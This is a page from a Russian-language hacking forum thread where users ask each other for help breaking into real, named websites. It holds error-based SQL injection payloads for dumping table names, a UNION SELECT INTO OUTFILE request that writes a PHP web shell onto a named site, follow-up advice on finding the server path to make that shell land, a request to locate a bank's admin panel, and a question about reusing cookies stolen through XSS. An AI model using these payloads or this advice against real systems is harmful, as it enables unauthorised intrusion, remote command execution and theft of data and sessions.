Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 753 of 1207
  1. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    дело не в этом.
    даже при запросе
    выдает
     
    #15041 j0ker13, 11 Oct 2010
  2. zolter

    zolter New Member

    Joined:
    10 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Всем привет,
    Нашел sql-inj, но не получается раскрутить:

    http://parus-grad.com.ua/SearchResult.html?ot=1'

    запросы типа

    http://parus-grad.com.ua/SearchResult.html?ot=(select+test) нормально проходят, но получить структуру таблиц в базе не получается. ругается то на 'TOP' то на 'FROM'

    Подскажите как добраться до списка таблиц на примере, а дальше я уже сам поковыряю. Спасибо!
     
    #15042 zolter, 11 Oct 2010
  3. madmg

    madmg New Member

    Joined:
    9 Jan 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    может у меня кривые руки, помогите создать запрос http://www.globalwinn.ro/index.php?lang=-English&page=mlm-tomorow
     
    #15043 madmg, 11 Oct 2010
  4. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    Получил печеньки с xss уявимости, а там больше параметров чем при простом посещении сайта, подставляю только те что есть - не работает, создаю новые, которых нет, но которые пришли от чувака - не работает, что делать? что не так?
     
    #15044 KREGI, 11 Oct 2010
  5. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,130
    Likes Received:
    74
    Reputations:
    34
    F яjHost 'тут айпи нашего админа' is not allowed to connect to this MySQL server
    что это такое что написано выше?это у меня появилось когда я сканировал свой серв на порты и серв мне дал скачать это тхт файл!(я/ знаю что админ управляет удаленно сервом!)
     
    #15045 dupD0M, 11 Oct 2010
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    этот Ip не имеет прав на подключение к mysql серверу
     
    #15046 попугай, 11 Oct 2010
  7. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,130
    Likes Received:
    74
    Reputations:
    34
    получается это на мой айпи написано а там где я отметил "айпи админа"говорит о том что ток он имеет право на управление сервером?
     
    #15047 dupD0M, 11 Oct 2010
  8. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Да. :rolleyes:
     
    #15048 DCrypt, 11 Oct 2010
  9. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Всем привет!
    Как лучше составить запрос, что бы избавиться от ошибки "..more 1 rowe.." (дословно не помню)
    запрос такой:
    Code:
    ' or (select count(*) from information_schema.tables group by concat((select group_concat(table_name) from information_schema.tables limit 0,1),floor(rand(0)*2)))/*
    -----------------------------------------------------------------------------------
    хочу внести некоторое дополнение:
    Redwood, спасибо, но я хочу использовать group_concat, т.к. после 3-х запросов блочится IP... так сказать, нужно сократить количество запросов.
    Как избежать ошибки
    Subquery returns more than 1 row
    при использовании group_concat в запросе выше.
     
    #15049 IMMORTAL_S, 12 Oct 2010
    Last edited: 12 Oct 2010
  10. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    999'+or+(select+count(*)+from+information_schema.tables+group+by+concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2)))--+
     
    #15050 h00lyshit!, 12 Oct 2010
  11. zolter

    zolter New Member

    Joined:
    10 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите раскрутить http://parus-grad.com.ua/SearchResult.html?ot=(select+test)
     
    #15051 zolter, 12 Oct 2010
  12. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Хм.. при таком запросе,
    Code:
    1' or (select count(*) from information_schema.tables group by concat((select concat_ws(0x3a,id,name,value,comments) from bla.configuration limit 0,1),floor(rand(0)*2)))/*
    тоже выдает
    Subquery returns more than 1 row
    С чем это может быть связано? ..таблица configuration единственная.
     
    #15052 IMMORTAL_S, 12 Oct 2010
    Last edited: 12 Oct 2010
  13. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    Помогите найти админку
    http://www.zembank.ru/
    В ПМ пожалуйста
     
    #15053 ubi, 12 Oct 2010
  14. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    takoe mozhet byt'?
     
    #15054 j0ker13, 12 Oct 2010
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    а что в этом не понятного? нету прав на information_schema
     
    _________________________
    #15055 Konqi, 13 Oct 2010
  16. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    подскажите, тут просто ошибка mysql или можно что-то выкружить:

    http://jmatch.com/member/profile.php?profile_id=21295740'
     
    #15056 durito, 13 Oct 2010
  17. 0pTik

    0pTik Banned

    Joined:
    18 Jul 2010
    Messages:
    240
    Likes Received:
    85
    Reputations:
    17
    Заливаю шелл

    PHP:
    http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+UNION+SELECT+1,%27%3C?%20system%28$_GET[cmd]%29;%20?%3E%27,3,4,5%20from%20mysql.user%20into+outfile+%271.php%27
    -- и никак не могу найти его ))
     
    #15057 0pTik, 13 Oct 2010
  18. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Путь нужно указывать абсолютный. Папка, в которую пишешь, должна быть доступна для записи.
     
    #15058 h00lyshit!, 13 Oct 2010
    Last edited: 13 Oct 2010
  19. 0pTik

    0pTik Banned

    Joined:
    18 Jul 2010
    Messages:
    240
    Likes Received:
    85
    Reputations:
    17
    Спасибо буду думать как мне путь узнать
     
    #15059 0pTik, 13 Oct 2010
  20. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Раз file_priv есть, то ищи конфиг апача. Там будет полный путь до твоего ресурса.
     
    #15060 mr.celt, 13 Oct 2010
(You must log in or sign up to post here.)
Page 753 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.